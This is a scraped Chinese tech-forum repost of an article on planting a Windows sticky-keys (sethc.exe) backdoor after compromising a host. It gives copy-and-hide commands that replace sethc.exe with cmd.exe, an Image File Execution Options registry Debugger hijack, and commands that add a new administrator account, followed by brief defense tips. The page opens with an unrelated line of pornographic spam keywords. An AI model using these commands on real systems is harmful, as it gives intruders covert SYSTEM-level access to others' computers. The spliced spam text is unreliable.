chinese直男口爆体育生外卖, 99久久er热在这里只有精品99, 又色又爽又黄18禁美女裸身无遮挡, gogogo高清免费观看日本电视,私密按摩师高清版在线,人妻视频毛茸茸,91论坛 兴趣闲谈,欧美 亚洲 精品 8区,国产精品久久久久精品免费

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

Windows Shift后門利用

jf_hKIAo4na ? 來源:Mi1k7ea ? 2023-01-30 10:38 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x00 前言

通常,在內網滲透打下一臺機子之后,可以給這臺機子留個Shift后門。

0x01 Shift后門利用

簡介

粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動系統(tǒng)的粘滯鍵功能,其進程名為Sethc.exe,應用程序在Windowssystem32下。

黑客用其它應用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當再次連續(xù)按5次SHIFT鍵,就會啟動黑客替換的應用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠程計算機時,在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動該漏洞,進而控制遠程計算機。

漏洞原理

在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運行,并且此時應用程序會以WINDOWS的最高權限-SYSTEM權限運行,所以計算機一旦被安裝該后門,入侵者便可悄無聲息地遠程操縱計算機。

漏洞利用

大致思路如下:

拿到目標主機權限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;

其中,命令行方式為:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要將dllcache文件夾中的緩存刪掉,否則會自動復原回去。

注冊表方式為:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說明:reg add是向注冊表添加記錄,后面跟的是注冊表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過/ v來指定鍵名,其中鍵名debugger是固定的,然后通過/ t來指定REG_SZ字符串類型,最后通過/ d來指定鍵的值,即被惡意替換的程序cmd.exe。

這樣,在下次遠程連接目標主機登錄的時候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;

可以輸入explorer.exe調出程序管理系統(tǒng)方便操作;

當然,上面的方法存在缺陷,就是可能會導致遠程連接無法持久進行,因此可以直接添加新用戶便于下次直接登錄:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設為everyone拒絕訪問;

直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。;

通過注冊表設置實現防御;

審核編輯 :李倩

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯系本站處理。 舉報投訴
  • WINDOWS
    +關注

    關注

    4

    文章

    3623

    瀏覽量

    92834
  • 應用程序
    +關注

    關注

    38

    文章

    3339

    瀏覽量

    59763
  • Shift
    +關注

    關注

    0

    文章

    5

    瀏覽量

    7634

原文標題:Windows Shift后門利用

文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    你的手機在監(jiān)聽!國安部曝光境外芯片可能暗藏“后門

    電子發(fā)燒友網報道(文/黃山明)如果家中門鎖有一把鑰匙掌握在自己不知道的人手中,相信住在里面的人也不會安心。如果是芯片被安裝了“后門”,那么被保存在其中的資料,自然存在泄露的風險。近期,國家安全部公開
    的頭像 發(fā)表于 07-22 07:31 ?5852次閱讀

    英偉達被約談!“后門”風險陰影下,人臉識別終端為何選國產芯片

    7月31日消息,為維護中國用戶網絡安全、數據安全,國家互聯網信息辦公室已約談英偉達,要求英偉達公司就對華銷售的H20算力芯片漏洞后門安全風險問題進行說明,并提交相關證明材料。英偉達芯片是否存在芯片
    的頭像 發(fā)表于 08-08 09:43 ?600次閱讀
    英偉達被約談!“<b class='flag-5'>后門</b>”風險陰影下,人臉識別終端為何選國產芯片

    國安部:境外產芯片或故意留“后門

    根據國家安全部微信公眾號發(fā)布的消息,我們發(fā)現居然有境外產芯片或故意留“后門”。 當心你身邊的“隱形竊密通道” 在如今高度數字化的時代,網絡安全的重要性愈發(fā)凸顯,不僅關乎著個人隱私、企業(yè)秘密,甚至
    的頭像 發(fā)表于 07-21 11:47 ?5046次閱讀

    今日看點丨國安部:境外生產芯片可能留“后門” 攝像頭被遠程開啟;英特爾終止了對 Clear Linux 的支持;宇

    ? ? ? 1、國安部:境外生產芯片可能留“后門”?攝像頭被遠程開啟 據國家安全部官微消息,一些境外生產的芯片、智能設備或者軟件可能在設計制造階段就被故意預埋了后門,廠商可以通過特定信號對設備進行
    發(fā)表于 07-21 10:51 ?2105次閱讀
    今日看點丨國安部:境外生產芯片可能留“<b class='flag-5'>后門</b>” 攝像頭被遠程開啟;英特爾終止了對 Clear Linux 的支持;宇

    國產海光OPS電腦怎樣快速切換windows和國產麒麟統(tǒng)信系統(tǒng)

    WINDOWS
    深圳雙芯信息科技有限公司
    發(fā)布于 :2025年06月23日 12:40:57

    統(tǒng)信Windows應用兼容引擎V3.3.0更新

    為打破平臺界限,讓應用體驗無縫銜接,deepin 團隊基于 Wine 技術,推出了“統(tǒng)信 Windows 應用兼容引擎”,支持在 deepin 和統(tǒng)信 UOS 系統(tǒng)上直接雙擊運行 Windows
    的頭像 發(fā)表于 06-04 13:58 ?836次閱讀

    Xilinx Shift RAM IP概述和主要功能

    Xilinx Shift RAM IP 是 AMD Xilinx 提供的一個 LogiCORE IP 核,用于在 FPGA 中實現高效的移位寄存器(Shift Register)。該 IP 核利用
    的頭像 發(fā)表于 05-14 09:36 ?686次閱讀

    DLP4500如何自動產生graycode和phase shift pattern?

    我在看DLP的sdk介紹和解析中說,DLP4500可以自動產生graycode和phase shift pattern,但是我沒有找到方法。 請問要怎么實現呢?具體的步驟是什么? 期待得到回復!謝謝
    發(fā)表于 02-27 08:19

    dlpc3433是否支持通過pixel shift來實現atw的功能?

    dlpc3433是否支持通過pixel shift來實現atw的功能,已幫助改善拖影和color break問題
    發(fā)表于 02-26 08:19

    windows搭建ftp服務器的步驟

    Windows系統(tǒng)上搭建FTP(文件傳輸協議)服務器通常涉及一系列步驟,包括安裝必要的服務、配置服務器設置、以及確保網絡安全設置允許FTP流量。 一、準備工作 確定操作系統(tǒng)版本 : 確保你
    的頭像 發(fā)表于 02-01 15:49 ?1950次閱讀

    hyper shift,hyper-v的正確關閉步驟

    步驟? ? ?Windows10系統(tǒng),通過控制面板卸載,打開“控制面板”,可以通過左下方的開始菜單或任務欄搜索找到。選擇“程序和功能”。點擊“啟用或關閉Windows功能”。在打開的窗口中,找到“Hyper-V”選項,取消勾選。點擊“確定”,等待系統(tǒng)完成卸載。 ? ?
    的頭像 發(fā)表于 01-23 11:09 ?1768次閱讀
    hyper <b class='flag-5'>shift</b>,hyper-v的正確關閉步驟

    mac和windows的區(qū)別 mac的優(yōu)缺點分析

    Mac和Windows的區(qū)別 Mac和Windows是兩種主流的操作系統(tǒng),它們各自有著不同的設計理念和用戶群體。以下是對Mac和Windows操作系統(tǒng)的一些基本區(qū)別和Mac的優(yōu)缺點分析。 1.
    的頭像 發(fā)表于 12-19 15:01 ?1.4w次閱讀

    Arm原生Google Chrome增強Windows on Arm性能

    微軟 Windows 10 和 Windows 11 集成了 Arm 原生支持,這保證了為 Windows 開發(fā)更多 Arm 原生應用。這種支持提供了額外的工具,以簡化應用移植、增強應用性能并降低功耗。因此,很多公司目前正在為
    的頭像 發(fā)表于 12-17 10:25 ?1515次閱讀

    2024 Commvault SHIFT全球巡演中國站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中國站完美收官。大會匯聚數據安全和管理領域的知名專家、業(yè)務掌舵人和生態(tài)伙伴,聚焦混合云趨勢下的數據保護需求變革,探討企業(yè)如何借助創(chuàng)新平臺驅動全新范式,成就持續(xù)業(yè)務的競爭優(yōu)勢,呈現了一場思想和技術的盛宴。
    的頭像 發(fā)表于 12-10 16:44 ?1080次閱讀

    Windows 10將于2025年終止免費更新,微軟力推Windows 11

    近日,微軟在其官方網站上發(fā)布了一則通知,宣布自2025年10月14日起,將正式停止為Windows 10操作系統(tǒng)提供來自Windows更新的免費軟件更新、技術支持以及安全修復程序。這一決定意味著
    的頭像 發(fā)表于 11-05 10:35 ?2542次閱讀